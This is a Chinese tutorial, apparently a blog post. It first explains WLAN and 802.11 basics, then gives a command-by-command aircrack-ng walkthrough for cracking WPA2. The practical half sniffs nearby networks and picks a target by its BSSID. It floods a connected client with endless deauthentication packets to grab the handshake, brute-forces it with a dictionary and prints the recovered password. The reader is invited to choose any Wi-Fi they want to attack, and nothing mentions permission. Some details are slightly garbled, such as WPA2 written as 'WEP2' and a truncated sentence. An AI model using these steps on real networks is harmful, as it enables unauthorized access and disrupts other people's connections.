先科普一下相关知识：

WLAN的设备
WLAN主要由接入点（Access Point，AP）和客户端（Station，STA）组成
接入点AP

• 类似于有线局域网中的交换器
• 负责管理客户端，协调无线与有线网络之间的通信

客户端STA

• 安装有无线网卡的计算机

 

WLAN的组网方式

WLAN的组网方式有2种：

• 3.1基础网络（Infrastructure Networks）
• 3.2自组织网络（Ad Hoc）

 

 

• WLAN：无线局域网络，英文wireless local area networks。是一种利用射频技术来代替铜缆，进行无线通信的技术。
• AP：接入点，英文access point或wireless access point。是链接有线网与无线网之间的桥梁。例如家用路由器就是一个AP。
• 802.11：802.11是美国电气和电子工程师协会（IEEE）在1997年颁布的无线区域网络（WLAN）标准，适用于有线AP与无线用户或无线用户之间的连接通信。
• 802.11x：指802.11标准制定之后再制定的一系列无线局域网标准
• Wi-Fi：是一种允许电子设备链接到一个无线局域网的技术，用于改善基于802.11x系列协议产品之间的互通性

 

802.11系列标准

从图中可以看到，802.11WLAN和有线局域网一样，也是基于IP的网络。但由于网络通信的介质不同，所以它们的物理层和数据链路层协议不同。

802.11网络结构
物理层

• 采用无线传输方式，一般有红外和微波传输技术；
• 调制技术有扩频和正交频分复用等。

数据链路层

• 分为两层：逻辑链路控制（LLC）和介质访问控制（MAC）。
• LLC主要提供各设备之间（逻辑链路）的连接的建立拆除，帧的可靠传输等。
• MAC主要实现各设备对通信的共享。由于有线和无线在物理上的差异，因此，MAC的实现也就不相同，因此也就带来新的安全问题。

 

常用的802.11系列标准

 

2.4G和5G Wi-Fi比较

①5GWi-Fi由于频率高，则电磁波的能量强，穿透能力（不变方向）强，信号穿透会损失很大能量，因此在传播过程衰减较大，传播距离

 

802.11访问认证的一般过程

扫描

• 发现无线局域网

认证（Authentication）

• 识别通信双方的身份

关联（Association）

• 建立链接

扫描

• 目的是发现无线局域网
• 主动扫描是指STA广播带有服务集标志（SSID）的探测信号，称之为探测帧；AP根据该信号进行响应。
• 被动扫描是指STA侦听AP广播的信标帧，该帧包含该网络的SSID，从而发现该网络。

认证（Authentication）

• 认证是无线网络中STA和AP相互证明其身份的机制。只有认证成功以后，双方才能进一步建立链接。
• 802.11最早提出的认证主要有开放式认证和共享密钥认证两种。
• 802.11i标准又提出了802.1x的认证方式。

关联（Association）

• 关联的作用是使通信双方增加和维护一个通信列表，确保“哪个无线接入点正在为该无线客户端服务”的答案是唯一的。
• 关联的目的是为了支持无线通信的移动性。

 

802.11i认证模式：

预共享密钥认证PSK：

 

802.11i保密

TKIP临时密钥完整性协议：

 

WEP（有线等效保密）认证过程：

• 客户端向接入点发送认证请求
• 接入点发回一段明文
• 客户端利用事先共享的密钥加密这段明文（对称），并再次发出认证请求
• 接入点对数据包进行解密，比较明文，来决定是否接受请求

WEP安全性：

• 就现有技术而言，WEP已不安全
• 密码学家分析出了WEP的好几个弱点，最终WEP被WPA彻底取代
• 现有的无线破解工具可以轻松破解基于wep的无线认证

 

WEP2（wifi网络安全接入）安全性：

• WPA2在密钥足够强的情况下是安全的，过短的密钥仍可能被爆破解出
• *WPA2-PSK指的是WPA2个人版，指的是使用事先约定的密钥进行认证的WPA2

 

 

下面就是实际操作：

 

Aircrack-ng抓包及破解WPA2

• 虚拟机安装无线网卡
• 配置无线网卡
• 利用airodump-ng进行抓包
• 利用crunch生成字典
• 利用aircrack-ng进行爆破

Aircrack是破解WEP/WPA/WPA2加密的主流工具之一。Aircrack-ng套件包含的工具可用于捕获数据包、握手验证。可用来进行暴力破解和字典攻击。

Aircrack-ng 攻击 主要是拿到握手包，用字典破解握手包。

首先，你得有个无线网卡，然后去自动配置他，操作嘛当然都是在kali虚拟机下进行的。

 

操作前输入：

airmon-ng check kill

kill掉影响网卡的进程，一般情况下，每次重启或者开机后这些进程都会自己开始。

将无线网卡模式改为monitor模式

iwconfig wlan0mon mode monitor 

 

打开网卡：

airmon-ng start wlan0

这时候网卡名为wlan0mon。（mon是monitor的缩写，意思为监控）

下一步就是wifi嗅探了，查看当前区域的所有wifi：

airodump-ng wlan0mon

• BSSID：wifi路由的 Mac地址， 
• Data 当前wifi数据大小，有数据就表明有人正在使用，你就可以把它作为一个选择了。
• CH ：渠道，后面的攻击要用到。 
• ESSID： wifi的 名字。还有，他的排序是按信号的强弱来排序的，越往上信号越强。PWR 是强度，不用记，慢慢的就知道了。

经过观察之后选择一个你想破解或者攻击的wifi，前提是它得有数据显示，Date的那列，所以选择攻击的wifi最好先从Date看起来，选择一个有数据的wifi之后按Ctrl+c 停止检测，复制你选择的Mac地址。

下一步

airodump-ng --bssid 0C:4B:54:AE:C1:06 -c 11 -w ~/wlan0/qihua wlan0mon

-c 是 渠道  bssid 是路由的Mac地址 -w是放包的目录

抓包结果如下：

可以看到有三个连接。

利用下面命令进行洪水攻击（重复不断的攻击）

aireplay-ng -0 0 -a 0C:4B:54:AE:C1:06 -c CC:2F:71:8C:FA:4B wlan0mon

-0表示一直不断的攻击，类似于拒绝服务攻击，占满你的握手请求通道，其他的连接进不来，也可以让当前所有连接断开，-c在这里表示的是client的mac地址。

攻击的时候不要关闭抓包窗口，注意观察抓包窗口。

过一会停掉洪水攻击，静等别人连接，出现WPA handshake :   ，就表示成功。如果有连接很快就可以抓到包

 

这是我的抓包信息：

抓到握手包那么就可以用密码字典进行爆破了，爆破的是.cap文件。

 

命令：

aircrack-ng -w password.txt wlan0/qihua-01.cap

接下来就静静等待跑包。

完成！密码51201314